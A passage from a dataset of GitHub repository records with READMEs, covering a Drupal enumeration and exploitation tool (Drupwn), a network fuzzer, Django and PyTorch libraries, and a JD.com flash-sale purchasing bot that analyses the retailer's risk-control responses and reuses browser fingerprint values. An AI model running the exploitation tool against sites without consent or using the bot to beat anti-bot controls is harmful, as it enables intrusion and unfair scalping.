Paix\\~ao\n and Claudine Badue\n and Alberto Ferreira De Souza\n and Thiago Oliveira-Santos},\n title = {{Keep your Eyes on the Lane: Real-time Attention-guided Lane Detection}},\n booktitle = {Conference on Computer Vision and Pattern Recognition (CVPR)},\n year = {2021}\n}\n```\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "immunIT/drupwn", "link": "https://github.com/immunIT/drupwn", "tags": [], "stars": 514, "description": "Drupal enumeration & exploitation tool", "lang": "Python", "repo_lang": "", "readme": "# Drupwn [v1.0.4]\n\n## Description\n\nDrupwn claims to provide an efficient way to gather drupal information.\n\nEnumeration\n[![asciicast](https://asciinema.org/a/5InNWAotigwM4bRscUi7yKAtt.svg)](https://asciinema.org/a/5InNWAotigwM4bRscUi7yKAtt)\n\nExploitation\n[![asciicast](https://asciinema.org/a/bZmopDt4lyix1D9sgxwQMCRfn.svg)](https://asciinema.org/a/bZmopDt4lyix1D9sgxwQMCRfn)\n\nFurther explaination on our [blog post article](https://www.immunit.ch/en/blog/2018/04/10/yet-another-drupal-scanner-drupwn-2/)\n\n## Supported tested version\n\n* Drupal 7\n* Drupal 8\n\n## Execution mode\n\nDrupwn can be run, using two seperate modes which are **enum** and **exploit**.\nThe enum mode allows performing enumerations whereas the exploit mode allows checking and exploiting CVEs.\n\n## Functionalities\n\n### Enum mode\n\n* User enumeration\n* Node enumeration\n* Default files enumeration\n* Module enumeration\n* Theme enumeration\n* Cookies support\n* User-Agent support\n* Basic authentication support\n* Request delay\n* Enumeration range\n* Logging\n* Socks and HTTP proxy support\n\n### Exploit mode\n\n* Vulnerability checker\n* CVE exploiter\n\n## Installation\n\n```bash\npip3 install -r requirements.txt\npython3 drupwn --help\n```\n\nor\n\n```bash\npython3 setup.py install\ndrupwn --help\n```\n\n## Usage\n\n```\n$ drupwn -h\n\n ____\n / __ \\_______ ______ _ ______\n / / / / ___/ / / / __ \\ | /| / / __ \\\n / /_/ / / / /_/ / /_/ / |/ |/ / / / /\n /_____/_/ \\__,_/ .___/|__/|__/_/ /_/\n /_/\n\nusage: drupwn [-h] [--mode MODE] [--target TARGET] [--users] [--nodes] [--modules] [--dfiles] [--themes]\n [--version VERSION] [--cookies COOKIES] [--thread THREAD]\n [--range RANGE] [--ua UA] [--bauth BAUTH]\n [--delay DELAY] [--log] [--update] \n [--proxy PROXY | --proxies PROXIES]\n\nDrupwn aims to automate drupal information gathering.\n\noptional arguments:\n -h, --help show this help message and exit\n --mode MODE enum|exploit\n --target TARGET hostname to scan\n --users user enumaration\n --nodes node enumeration\n --modules module enumeration\n --dfiles default files enumeration\n --themes theme enumeration\n --version VERSION Drupal version\n --cookies COOKIES cookies\n --thread THREAD threads number\n --range RANGE enumeration range\n --ua UA User Agent\n --bauth BAUTH Basic authentication\n --delay DELAY request delay\n --log file logging\n --update update plugins and themes\n --proxy PROXY [http|https|socks]://host:port\n --proxies PROXIES Proxies file\n```\n\n## Docker alternative\n\n### Official image\n\nYou can pull the official Drupwn image from the dockerhub registry using the following command:\n\n```\ndocker pull immunit/drupwn\n```\n\n### Build\n\nTo build the container, just use this command:\n\n```bash\ndocker build -t drupwn .\n```\n\nDocker will download the Alpine image and then execute the installation steps.\n\n> Be patient, the process can be quite long the first time.\n\n### 
Run\n\nOnce the build process is over, get and enjoy your new Drupal scanner:\n\n```bash\ndocker run --rm -it drupwn --help\n```\n\n## Logging\n\nThe generated output is stored in the **/tmp/** folder.\nWhen using Docker, run your container with the following option:\n\n```bash\n-v YOUR_PATH_FOLDER:/tmp/\n```\n\n## Enhancement\n\nTo add a new module, follow the template used in the *User.py* file.\nThen, add a reference in the Parser as well as in the Dispatcher in order to ensure its support by the reflective factory.\n\n## Disclaimer of Warranty\n\nDrupwn is provided under this License on an \"as is\" basis, without warranty of any kind, either expressed, implied, or statutory, including, without limitation, warranties that Drupwn is free of defects, merchantable, fit for a particular purpose or non-infringing.\n\n## Disclaimer\n\nRunning Drupwn against websites without prior mutual consent may be illegal in your country. The ImmunIT team accepts no liability and is not responsible for any misuse or damage caused by Drupwn.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "13812851221/-rxrw-daily_morning", "link": "https://github.com/13812851221/-rxrw-daily_morning", "tags": [], "stars": 514, "description": null, "lang": "Python", "repo_lang": "", "readme": "# Daily good-morning push to other people's girlfriends\n\nThis was first published on Xiaohongshu, but some people said the instructions there were hard to follow, so here is a proper manual.\n\n> I was surprised to hear in the Xiaohongshu group that some users have been promoting this project on Douyin..\n>\n> Thanks a lot for that, since I'm too lazy to make a video myself. The project was a whim, so I only posted it on Xiaohongshu.\n>\n> I'm really grateful that everyone likes it, but some friends say they can't find me. I'm still quite interested in gaining followers.\n\n*My Xiaohongshu nickname == Douyin nickname == Weibo account == the same on every platform == \"Tangled in Power\"*\n\nAll of them use a Conan avatar.\n\n![WechatIMG1](https://user-images.githubusercontent.com/9566402/185802023-1f28c90a-40e7-446e-8dad-420c83f83e38.jpeg)\n![WechatIMG2](https://user-images.githubusercontent.com/9566402/185802026-ef7c1b99-66a8-4535-a6a4-804677657667.jpeg)\n\n---------------------- The main text follows ----------------------\n\nWhen I was thinking about how this tutorial could get friends who don't know programming started quickly, my goals were: no server to set up, no scheduled tasks to maintain, and as little code as possible to touch. After weighing the options, I realized GitHub Actions can be used for free.\n\nThe effect is shown in the figure below. 
Of course, the text can be modified.\n![5e72e89fd7ff692a0bfa62010517c0c](https://user-images.githubusercontent.com/9566402/183242263-c93517a2-5377-435d-8386-8d47252c9e07.jpg)\n\nFirst, as shown in the picture, open the WeChat Official Accounts test account page and log in by scanning the QR code with WeChat!\n![cf7dbd4502df44765ed3506f55caea5](https://user-images.githubusercontent.com/9566402/183242272-134e37e7-718d-42dd-9ed7-fca2810e94e6.png)\n\nClick \"Use this template\" as shown in the picture to create a copy of the repository under your own account!\n![e6581c43572b00b12c1a82ca8d7178b](https://user-images.githubusercontent.com/9566402/183242340-2ef26c63-1ca1-420e-abd4-8672c25d61c9.png)\n\nAs shown in the figures below, create the message template, then copy the various strings from the WeChat test platform into GitHub -> Settings -> Secrets -> Actions as instructed.\n![71bf9d11a876d23ef0f0728645a8ba0](https://user-images.githubusercontent.com/9566402/183242301-fd6ab30e-bfe5-4245-b2a9-f690184db307.png)\n![381e8ee4a7c5ec6b8c09719f2c7e486](https://user-images.githubusercontent.com/9566402/183242295-4dcf06bb-2083-4883-8745-0af753ca805c.png)\n![48c60750cec7adc546e0ad99e3082b3](https://user-images.githubusercontent.com/9566402/183242320-18500adc-14e5-4522-a3ad-ae19cc4479bf.png)\n\nEnable Actions in your own repository!\n![30a5b1b2b06ba4a40a3d8ef01652409](https://user-images.githubusercontent.com/9566402/183242334-9943c538-ba3d-4d01-8377-d040143b7560.png)\n\nIf a run fails, you can inspect the error as shown below. You can also ask questions here or in the Xiaohongshu group.\n![6b0da6f44e18c2bfd94910c377d13e6](https://user-images.githubusercontent.com/9566402/183242349-1aa5ada6-2ee7-4cf9-a542-4b2dad88b8fe.png)\n\nAfter enabling it, you can trigger a run directly to check whether your girlfriend's phone receives the push!\nThe scheduled task sends the push at 8:00 every morning. If you can program, feel free to customize it~\n\nApart from the English strings and the Chinese in the template message, which will differ, your setup should match the figures exactly, otherwise the program won't run~\n\nYou can click Star in the upper right corner of GitHub to give me some encouragement~\n\nFollow and like me on Xiaohongshu; if you have any interesting ideas, you can @ me and I will show you how to build them.\n\nP.S. A few additional notes:\n\n1. The appsecret shown the first time by the WeChat test account page may be wrong; just refresh the page.\n2. The date format for birthdays is `05-20`, while anniversaries use `2022-08-09`; please mind the difference. For the city, use a prefecture-level city, e.g. `Beijing`, `Guangzhou`, `Chengde`.\n3. The strings pasted into the secrets must not contain spaces or newlines, except for the template.\n4. The GitHub Actions schedule is defined in the workflow as `0 0 * * *`, i.e. midnight UTC, which is 8:00 Beijing time. Because GitHub runs many scheduled jobs at the same time, there can be a delay.\n5. I will occasionally improve the code; right now I am working on a full platform project that should make it even easier to get started.\n\nBut that platform isn't quite ready yet, and I'm going to hold back my urge to make money from it (it's not about that).
.", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "Cisco-Talos/mutiny-fuzzer", "link": "https://github.com/Cisco-Talos/mutiny-fuzzer", "tags": [], "stars": 514, "description": null, "lang": "Python", "repo_lang": "", "readme": "# Quickstart: Mutiny tutorial\n\nBlog post here:\n* http://blog.talosintelligence.com/2018/01/tutorial-mutiny-fuzzing-framework-and.html\n\nLinks to this YouTube video demo:\n* https://www.youtube.com/watch?v=FZyR6MgJCUs\n\nFor more features geared towards fuzzing campaigns/feedback/harnesses:\n* https://github.com/Cisco-Talos/mutiny-fuzzer/tree/experiment\n\n# Mutiny Fuzzing Framework\n\nThe Mutiny Fuzzing Framework is a network fuzzer that operates by replaying\nPCAPs through a mutational fuzzer. The goal is to begin network fuzzing as\nquickly as possible, at the expense of being thorough.\n\nThe general workflow for Mutiny is to take a sample of legitimate traffic, such\nas a browser request, and feed it into a prep script to generate a .fuzzer file.\nThen, Mutiny can be run with this .fuzzer file to generate traffic against a\ntarget host, mutating whichever packets the user would like.\n\nThere are extensions that allow changing how Mutiny behaves, including changing\nmessages based on input/output, changing how Mutiny responds to network errors,\nand monitoring the target in a separate thread.\n\nMutiny uses [Radamsa](https://github.com/aoh/radamsa) to perform mutations.\n\nThe [Decept Proxy](https://github.com/Cisco-Talos/Decept) is a multi-purpose\nnetwork proxy that can forward traffic from a plaintext or TLS TCP/UDP/domain\nsocket connection to a plaintext or TLS TCP/UDP/domain socket connection, among\nother features. It makes a good companion for Mutiny, as it can both generate\n.fuzzer files directly, particularly helpful when fuzzing TLS connections, and\nallow Mutiny to communicate with TLS hosts.\n\nsample_apps give a basic idea of some things that can be done with the fuzzer,\nwith a few different applications/clients to test with.\n\nWritten by James Spadaro (jaspadar@cisco.com) and Lilith Wyatt\n(liwyatt@cisco.com)\n\n## Setup\n\nEnsure python and scapy are installed.\n\nUntar Radamsa and `make` (You do not have to make install, unless you want it\nin /usr/bin - it will use the local Radamsa) Update `mutiny.py` with path to\nRadamsa if you changed it.\n\n## Basic Usage\n\nSave pcap into a folder. Run `mutiny_prep.py` on `.pcap` (also optionally\npass the directory of a custom processor if any, more below). Answer the\nquestions, end up with a `.fuzzer` file in same folder as pcap.\n\nRun `mutiny.py .fuzzer ` This will start fuzzing. Logs will be\nsaved in same folder, under directory\n`_logs//`\n\n## More Detailed Usage\n\n### .fuzzer Files\n\nThe .fuzzer files are human-readable and commented. They allow changing various\noptions on a per-fuzzer-file basis, including which message or message parts are\nfuzzed.\n\n### Message Formatting\n\nWithin a .fuzzer file is the message contents. These are simply lines that\nbegin with either 'inbound' or 'outbound', signifying which direction the\nmessage goes. They are in Python string format, with '\\xYY' being used for\nnon-printable characters. These are autogenerated by 'mutiny_prep.py' and\nDecept, but sometimes need to be manually modified.\n\n### Message Formatting - Manual Editing\n\nIf a message has the 'fuzz' keyword after 'outbound', this indicates it is to be\nfuzzed through Radamsa. 
A given message can have line continuations, by simply\nputting more message data in quotes on a new line. In this case, this second\nline will be merged with the first.\n\nAlternatively, the 'sub' keyword can be used to indicate a subcomponent. This\nallows specifying a separate component of the message, in order to fuzz only\ncertain parts and for convenience within a Message Processor.\n\nHere is an example arbitrary set of message data:\n```\noutbound 'say'\n ' hi'\nsub fuzz ' and fuzz'\n ' this'\nsub ' but not this\\xde\\xad\\xbe\\xef'\ninbound 'this is the server's'\n ' expected response'\n```\n\nThis will cause Mutiny to transmit `say hi and fuzz this but not\nthis(0xdeadbeef)`. `0xdeadbeef` will be transmitted as 4 hex bytes. `and fuzz\nthis` will be passed through Radamsa for fuzzing, but `say hi` and ` but not\nthis(0xdeadbeef)` will be left alone.\n\nMutiny will wait for a response from the server after transmitting the single\nabove message, due to the 'inbound' line. The server's expected response is\n`this is the server's expected response`. Mutiny won't do a whole lot with this\ndata, aside from seeing if what the server actually sent matches this string.\nIf a crash occurs, Mutiny will log both the expected output from the server and\nwhat the server actually replied with.\n\n### Customization\n\nmutiny_classes/ contains base classes for the Message Processor, Monitor, and\nException Processor. Any of these files can be copied into the same folder as\nthe .fuzzer (by default) or into a separate subfolder specified as the\n'processor_dir' within the .fuzzer file.\n\nThese three classes allow for storing server responses and changing outgoing\nmessages, monitoring the target on a separate thread, and changing how Mutiny\nhandles exceptions.\n\n### Customization - Message Processor\n\nThe Message Processor defines various callbacks that are called during a fuzzing\nrun. Within these callbacks, any Python code can be run. Anecdotally, these\nare primarily used in three ways.\n\nThe most common is when the server sends tokens that need to be added to future\noutbound messages. For example, if Mutiny's first message logs in, and the\nserver responds with a session ID, the `postReceiveProcess()` callback can be used\nto store that session ID. Then, in `preSendProcess()`, the outgoing data can be\nfixed up with that session ID. An example of this is in\n`sample_apps/session_server`.\n\nAnother common use of a Message Processor is to limit or change a fuzzed\nmessage. For example, if the server always drops messages greater than 1000\nbytes, it may not be worth sending any large messages. `preSendProcess()` can be\nused to shorten messages after fuzzing but before they are sent or to raise an\nexception.\n\nRaising an exception brings up the final way Message Processors are commonly\nused. Within a callback, any custom exceptions defined in\n`mutiny_classes/mutiny_exceptions.py` can be raised. There are several\nexceptions, all commented, that will cause various behaviors from Mutiny. These\ngenerally involve either logging, retrying, or aborting the current run.\n\n### Customization - Monitor\n\nThe Monitor has a `monitorTarget()` function that is run on a separate thread from\nthe main Mutiny fuzzer. The purpose is to allow implementing a long-running\nprocess that can monitor a host in some fashion. This can be anything that can\nbe done in Python, such as communicating with a monitor daemon running on the\ntarget, reading a long file, or even just pinging the host repeatedly, depending\non the requirements of the fuzzing session.
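\n\nAs an illustration only, a ping-based monitor could look roughly like the sketch below. The exact callback signature is defined by the Monitor base class shipped in `mutiny_classes/`, so check that file before relying on this; here we simply assume `monitorTarget()` receives the target address and a `signalMain` callback, as described above.\n\n```python\n# Rough, illustrative sketch of a Monitor that pings the target once per second.\n# The base-class signature below is an assumption; adapt it to mutiny_classes/.\nimport subprocess\nimport time\n\n\nclass Monitor(object):\n    def monitorTarget(self, targetIP, targetPort, signalMain):\n        # Runs on its own thread; loop forever, since returning stops monitoring.\n        while True:\n            alive = subprocess.call(\n                ['ping', '-c', '1', '-W', '1', targetIP],\n                stdout=subprocess.DEVNULL,\n            ) == 0\n            if not alive:\n                # Tell the main Mutiny thread that the target appears to be down.\n                signalMain()\n            time.sleep(1)\n```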
\n\nIf the Monitor detects a crash, it can call `signalMain()` at any time. This will\nsignal the main Mutiny thread that a crash has occurred, and it will log the\ncrash. This function should generally operate in an infinite loop, as returning\nwill cause the thread to terminate, and it will not be restarted.\n\n### Customization - Exception Processor\n\nThe Exception Processor determines what Mutiny should do with a given exception\nduring a fuzz session. In the most general sense, the `processException()`\nfunction will translate Python and OS-level exceptions into Mutiny error\nhandling actions as best as it can.\n\nFor example, if Mutiny gets 'Connection Refused', the default response is to\nassume that the target server has died unrecoverably, so Mutiny will log the\nprevious run and halt. This is true in most cases, but this behavior can be\nchanged to that of any of the exceptions in\n`mutiny_classes/mutiny_exceptions.py` as needed, allowing tailoring of crash\ndetection and error correction.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "adamchainz/django-mysql", "link": "https://github.com/adamchainz/django-mysql", "tags": ["django", "mysql", "mariadb", "python"], "stars": 514, "description": ":dolphin: :horse: Extensions to Django for use with MySQL/MariaDB", "lang": "Python", "repo_lang": "", "readme": "============\nDjango-MySQL\n============\n\n.. image:: https://img.shields.io/readthedocs/django-mysql?style=for-the-badge\n :target: https://django-mysql.readthedocs.io/en/latest/\n\n.. image:: https://img.shields.io/github/actions/workflow/status/adamchainz/django-mysql/main.yml?branch=main&style=for-the-badge\n :target: https://github.com/adamchainz/django-mysql/actions?workflow=CI\n\n.. image:: https://img.shields.io/badge/Coverage-100%25-success?style=for-the-badge\n :target: https://github.com/adamchainz/django-mysql/actions?workflow=CI\n\n.. image:: https://img.shields.io/pypi/v/django-mysql.svg?style=for-the-badge\n :target: https://pypi.org/project/django-mysql/\n\n.. image:: https://img.shields.io/badge/code%20style-black-000000.svg?style=for-the-badge\n :target: https://github.com/psf/black\n\n.. image:: https://img.shields.io/badge/pre--commit-enabled-brightgreen?logo=pre-commit&logoColor=white&style=for-the-badge\n :target: https://github.com/pre-commit/pre-commit\n :alt: pre-commit\n\n.. 
figure:: https://raw.github.com/adamchainz/django-mysql/main/docs/images/dolphin-pony.png\n :alt: The dolphin-pony - proof that cute + cute = double cute.\n\n..\n\n | The dolphin-pony - proof that cute + cute = double cute.\n\n\nDjango-MySQL extends Django's built-in MySQL and MariaDB support their specific\nfeatures not available on other databases.\n\n\nWhat kind of features?\n----------------------\n\nIncludes:\n\n* ``QuerySet`` extensions:\n\n * 'Smart' iteration - chunked pagination across a large queryset\n * ``approx_count`` for quick estimates of ``count()``\n * Query hints\n * Quick ``pt-visual-explain`` of the underlying query\n\n* Model fields:\n\n * MariaDB Dynamic Columns for storing dictionaries\n * Comma-separated fields for storing lists and sets\n * 'Missing' fields: differently sized ``BinaryField``/``TextField`` classes,\n ``BooleanField``\\s represented by BIT(1)\n\n* ORM expressions for over 20 MySQL-specific functions\n* A new cache backend that makes use of MySQL's upsert statement and does\n compression\n* Status variable inspection and utility methods\n* Named locks for easy locking of e.g. external resources\n* Table lock manager for hard to pull off data migrations\n\nTo see them all, check out the exposition at\nhttps://django-mysql.readthedocs.io/en/latest/exposition.html .\n\nRequirements and Installation\n-----------------------------\n\nPlease see\nhttps://django-mysql.readthedocs.io/en/latest/installation.html .\n\nDocumentation\n-------------\n\nEvery detail documented on\n`Read The Docs `_.\n", "readme_type": "rst", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "eladhoffer/seq2seq.pytorch", "link": "https://github.com/eladhoffer/seq2seq.pytorch", "tags": ["deep-learning", "neural-machine-translation", "seq2seq"], "stars": 514, "description": "Sequence-to-Sequence learning using PyTorch", "lang": "Python", "repo_lang": "", "readme": "# Seq2Seq in PyTorch\nThis is a complete suite for training sequence-to-sequence models in [PyTorch](www.pytorch.org). It consists of several models and code to both train and infer using them.\n\nUsing this code you can train:\n* Neural-machine-translation (NMT) models\n* Language models\n* Image to caption generation\n* Skip-thought sentence representations\n* And more...\n \n ## Installation\n ```\n git clone --recursive https://github.com/eladhoffer/seq2seq.pytorch\n cd seq2seq.pytorch; python setup.py develop\n ```\n \n## Models\nModels currently available:\n* Simple Seq2Seq recurrent model\n* Recurrent Seq2Seq with attentional decoder\n* [Google neural machine translation](https://arxiv.org/abs/1609.08144) (GNMT) recurrent model\n* Transformer - attention-only model from [\"Attention Is All You Need\"](https://arxiv.org/abs/1706.03762)\n\n## Datasets\nDatasets currently available:\n\n* WMT16\n* WMT17\n* OpenSubtitles 2016\n* COCO image captions\n* [Conceptual captions](https://ai.googleblog.com/2018/09/conceptual-captions-new-dataset-and.html)\n\nAll datasets can be tokenized using 3 available segmentation methods:\n\n* Character based segmentation\n* Word based segmentation\n* Byte-pair-encoding (BPE) as suggested by [bpe](https://arxiv.org/abs/1508.07909) with selectable number of tokens. \n\nAfter choosing a tokenization method, a vocabulary will be generated and saved for future inference.\n\n\n## Training methods\nThe models can be trained using several methods:\n\n* Basic Seq2Seq - given encoded sequence, generate (decode) output sequence. 
Training is done with teacher-forcing.\n* Multi Seq2Seq - where several tasks (such as multiple languages) are trained simultaneously by using the data sequences as both input to the encoder and output for decoder.\n* Image2Seq - used to train image to caption generators.\n\n## Usage\nExample training scripts are available in ``scripts`` folder. Inference examples are available in ``examples`` folder.\n\n* example for training a [transformer](https://arxiv.org/abs/1706.03762)\n on WMT16 according to original paper regime:\n```\nDATASET=${1:-\"WMT16_de_en\"}\nDATASET_DIR=${2:-\"./data/wmt16_de_en\"}\nOUTPUT_DIR=${3:-\"./results\"}\n\nWARMUP=\"4000\"\nLR0=\"512**(-0.5)\"\n\npython main.py \\\n --save transformer \\\n --dataset ${DATASET} \\\n --dataset-dir ${DATASET_DIR} \\\n --results-dir ${OUTPUT_DIR} \\\n --model Transformer \\\n --model-config \"{'num_layers': 6, 'hidden_size': 512, 'num_heads': 8, 'inner_linear': 2048}\" \\\n --data-config \"{'moses_pretok': True, 'tokenization':'bpe', 'num_symbols':32000, 'shared_vocab':True}\" \\\n --b 128 \\\n --max-length 100 \\\n --device-ids 0 \\\n --label-smoothing 0.1 \\\n --trainer Seq2SeqTrainer \\\n --optimization-config \"[{'step_lambda':\n \\\"lambda t: { \\\n 'optimizer': 'Adam', \\\n 'lr': ${LR0} * min(t ** -0.5, t * ${WARMUP} ** -1.5), \\\n 'betas': (0.9, 0.98), 'eps':1e-9}\\\"\n }]\"\n```\n\n* example for training attentional LSTM based model with 3 layers in both encoder and decoder:\n```\npython main.py \\\n --save de_en_wmt17 \\\n --dataset ${DATASET} \\\n --dataset-dir ${DATASET_DIR} \\\n --results-dir ${OUTPUT_DIR} \\\n --model RecurrentAttentionSeq2Seq \\\n --model-config \"{'hidden_size': 512, 'dropout': 0.2, \\\n 'tie_embedding': True, 'transfer_hidden': False, \\\n 'encoder': {'num_layers': 3, 'bidirectional': True, 'num_bidirectional': 1, 'context_transform': 512}, \\\n 'decoder': {'num_layers': 3, 'concat_attention': True,\\\n 'attention': {'mode': 'dot_prod', 'dropout': 0, 'output_transform': True, 'output_nonlinearity': 'relu'}}}\" \\\n --data-config \"{'moses_pretok': True, 'tokenization':'bpe', 'num_symbols':32000, 'shared_vocab':True}\" \\\n --b 128 \\\n --max-length 80 \\\n --device-ids 0 \\\n --trainer Seq2SeqTrainer \\\n --optimization-config \"[{'epoch': 0, 'optimizer': 'Adam', 'lr': 1e-3},\n {'epoch': 6, 'lr': 5e-4},\n {'epoch': 8, 'lr':1e-4},\n {'epoch': 10, 'lr': 5e-5},\n {'epoch': 12, 'lr': 1e-5}]\" \\\n```\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "hu619340515/jd_seckill-1", "link": "https://github.com/hu619340515/jd_seckill-1", "tags": [], "stars": 514, "description": "fork huanghyw/jd_seckill", "lang": "Python", "repo_lang": "", "readme": "#Jd_Seckill\n\n## Special statement:\n\n* Any scripts involved in the `jd_seckill` project released in this warehouse are only for testing and learning research, and commercial use is prohibited, and its legality, accuracy, completeness and validity cannot be guaranteed, please judge by yourself according to the situation.\n\n* All resource files in this project are prohibited from being reproduced or published in any form by any official account or self-media.\n\n* `huanghyw` is not responsible for any script issues, including but not limited to any loss or damage caused by any script errors.\n\n* For any user who indirectly uses the script, including but not limited to establishing a VPS or disseminating it in violation of national laws or relevant regulations, `huanghyw` is not 
responsible for any privacy leaks or other consequences arising from such use.\n\n* Do not use any part of the `jd_seckill` project for commercial or illegal purposes; if you do, you do so at your own risk.\n\n* If any organization or individual believes that a script in this project may infringe on their rights, they should notify us promptly and provide proof of identity and ownership. We will delete the relevant script after receiving the supporting documents.\n\n* Anyone who views this project in any way, or uses any script that directly or indirectly relies on the `jd_seckill` project, should read this statement carefully. `huanghyw` reserves the right to change or supplement this disclaimer at any time. By using or copying any related script or the `jd_seckill` project, you are deemed to have accepted this disclaimer.\n \n* You must completely delete the above content from your computer or phone within 24 hours of downloading it.\n \n* This project follows the `GPL-3.0 License`. If there is any conflict between this special statement and the `GPL-3.0 License`, this special statement shall prevail.\n\n> ***If you use or copy any code from this repository or any project based on it, you are deemed to have accepted this statement; please read it carefully.***\n> ***If you used or copied any code from this repository or any project based on it before this statement was published, and you are still using it now, you are likewise deemed to have accepted this statement; please read it carefully.***\n\n## Introduction\nBased on my own use between 2020-12-12 and 2020-12-17, I can confirm that this script can indeed grab Moutai. I grabbed 4 bottles across my own three accounts and another 4 bottles for two friends.\nAs long as your configuration file is correct and your cookies have not expired, you will eventually succeed if you keep at it.\n\nAccording to feedback from users during this period, products other than Moutai, i.e. those that do not need to be added to the shopping cart, cannot be grabbed. The exact cause has not been investigated yet; most likely JD has changed the purchase flow for non-Moutai products.\nTo avoid wasting your time, do not try to grab non-Moutai products for now.\nA new version will be released once this problem is solved.\n\n\n## Observations\n\nBased on the logs of Moutai purchase attempts since December 14, we can make an educated guess about the relationship between the `resultCode` in the returned JSON message and Xiaobai Credit (JD's credit score).\nHere we mainly analyze `90016` and `90008`, the two codes with the highest frequency.\n\n### Sample JSON\n```json\n{'errorMessage': 'It's a pity that I didn't get it, let's make persistent efforts. ', 'orderId': 0, 'resultCode': 90016, 'skuId': 0, 'success': False}\n
{'errorMessage': 'It's a pity that I didn't get it, let's make persistent efforts. ', 'orderId': 0, 'resultCode': 90008, 'skuId': 0, 'success': False}\n```\n\n### Statistics\n\n| Case | Xiaobai Credit | 90016 | 90008 | Time until success |\n| ---- | -------- | ------ | ------ | -------- |\n| Zhang San | 63.8 | 59.63% | 40.37% | Not yet |\n| Li Si | 92.9 | 72.05% | 27.94% | 4 days |\n| Wang Wu | 99.6 | 75.70% | 24.29% | Not yet |\n| Zhao Liu | 103.4 | 91.02% | 8.9% | 2 days |\n\n### Guess\nIt appears that `90008` is returned by JD.com's risk control mechanism: such a request fails outright and never enters the actual purchase draw.\nThe lower your Xiaobai Credit, the more likely you are to trigger JD's risk control.\nJudging from the data, risk control seems to step roughly once per ten points of Xiaobai Credit, so Zhao Liu is almost never intercepted, Li Si and Wang Wu have a similar chance of being intercepted, and Zhang San is intercepted most often.\nOnly requests that pass risk control take part in the purchase draw, which seems to behave like reservoir sampling: since not every request can be served, successful buyers are spread out evenly, so in the end it comes down to probability.\n\n> In short, it is rather difficult for Zhang San to succeed, and users with a Xiaobai Credit of 100+ have the highest chance of success.\n\n## Main features\n\n- Log in to JD Mall ([www.jd.com](http://www.jd.com/))\n - Scan the QR code with the JD mobile app\n- Reserve Moutai\n - Automatic scheduled reservation\n- Wait for the purchase window after reserving\n - Automatic scheduled purchase\n\n## Operating environment\n\n- [Python 3](https://www.python.org/)\n\n## Third-party libraries\n\n- The required libraries are listed in requirements.txt; install them with\n`pip install -r requirements.txt`\n- If installing third-party libraries is slow in China, you can use the Tsinghua mirror to speed it up:\n`pip install -r requirements.txt -i https://pypi.tuna.tsinghua.edu.cn/simple/`\n\n## Tutorial\n#### 1. Chrome browser is recommended\n#### 2. Log in on the web page by scanning the QR code, or with your account and password\n#### 3. Fill in the configuration in config.ini\n(1) `eid` and `fp`: place an order for any ordinary product and you can see these two values by capturing the network traffic. They can be hard-coded once obtained.\n> Just pick a product, place an order and go to the checkout page, open the browser's developer tools, switch to the Console tab, type the variable `_JdTdudfp` in the console, and you can read `eid` and `fp` from the output JSON.\n> If that does not work, refer to the original author's issue https://github.com/zhou-xiaojun/jd_mask/issues/22\n\n(2) `sku_id`, `DEFAULT_USER_AGENT`\n> `sku_id` is already filled in for Moutai.\n> `cookies_string` is no longer needed.\n> `DEFAULT_USER_AGENT` can be left at its default. In Google Chrome you can also enter about:version in the address bar to view your `USER_AGENT` and substitute it.\n\n(3) Configure the time\n> It is no longer mandatory to synchronize your clock; the program automatically synchronizes with JD's time.\n>> Still, if your computer's clock is off by hours, it is better to synchronize it.\n\nAll of the above are required.\n> Tips:\n> After the program starts, it measures the difference between the local time and the JD server time; the reported difference is local time minus JD server time, so -50 means the local clock is 50 ms behind the JD server.\n> The execution time of this code is based on the local computer/server time.\n
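\nIf you want to eyeball that offset yourself, the following standalone snippet is one rough way to do it. It is not part of this project and only reads the `Date` header of an ordinary HTTPS response, so it is accurate to about a second at best:\n\n```python\n# Rough, illustrative clock check: compare the local clock against the Date\n# header returned by a JD web server. Second-level accuracy only.\nimport email.utils\nimport time\n\nimport requests\n\nresp = requests.get('https://www.jd.com', timeout=5)\nserver_ts = email.utils.parsedate_to_datetime(resp.headers['Date']).timestamp()\nprint(f'local - server ~= {time.time() - server_ts:+.1f} s')\n```\n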
\n(4) Modify the number of bottles to buy\n> The default number of bottles in the code is 2, and it cannot be changed in the configuration file.\n> If you already bought a bottle within the last month, it is best to change the number to 1.\n> To do so, search for `self.seckill_num = 2` in the `jd_spider_requests.py` file and change the `2` to `1`.\n\n#### 4. Run main.py\nChoose the function you need according to the prompts. If you are asked to scan a QR code to log in, check whether a `qr_code.png` file exists in the project directory; if it does, open the image and scan it with the JD mobile app to log in.\n\n- *Displaying the QR code on the command line under Linux (using Ubuntu as an example)*\n\n```bash\n$ sudo apt-get install qrencode zbar-tools # Install QR code parsing and generation tools for reading QR codes and outputting them on the command line.\n$ zbarimg qr_code.png > qrcode.txt && qrencode -r qrcode.txt -o - -t UTF8 # Analyze the QR code and output it to the command line window.\n```\n\n#### 5. Confirming the result\nWhether the purchase succeeded can usually be seen within one minute of the program running!\nSearch the log: if it contains \"successful purchase, order number xxxxx\", the order was placed successfully and must be paid within half an hour!\nIf you have not grabbed the item within two minutes, you basically did not get it this round. The program does not stop automatically for now, so in either case you need to stop it manually!\n\n## Tipping\nNo need to send tips any more. If you got your Moutai, enjoy it; if you did not, keep at it :)\n\n## Acknowledgements\n##### Many thanks to the original author for the code: https://github.com/zhou-xiaojun/jd_mask\n##### Thanks also to https://github.com/wlwwu/jd_maotai for the optimizations", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "st-tech/zr-obp", "link": "https://github.com/st-tech/zr-obp", "tags": ["datasets", "off-policy-evaluation", "contextual-bandits", "multi-armed-bandits", "research"], "stars": 514, "description": "Open Bandit Pipeline: a python library for bandit algorithms and off-policy evaluation", "lang": "Python", "repo_lang": "", "readme": 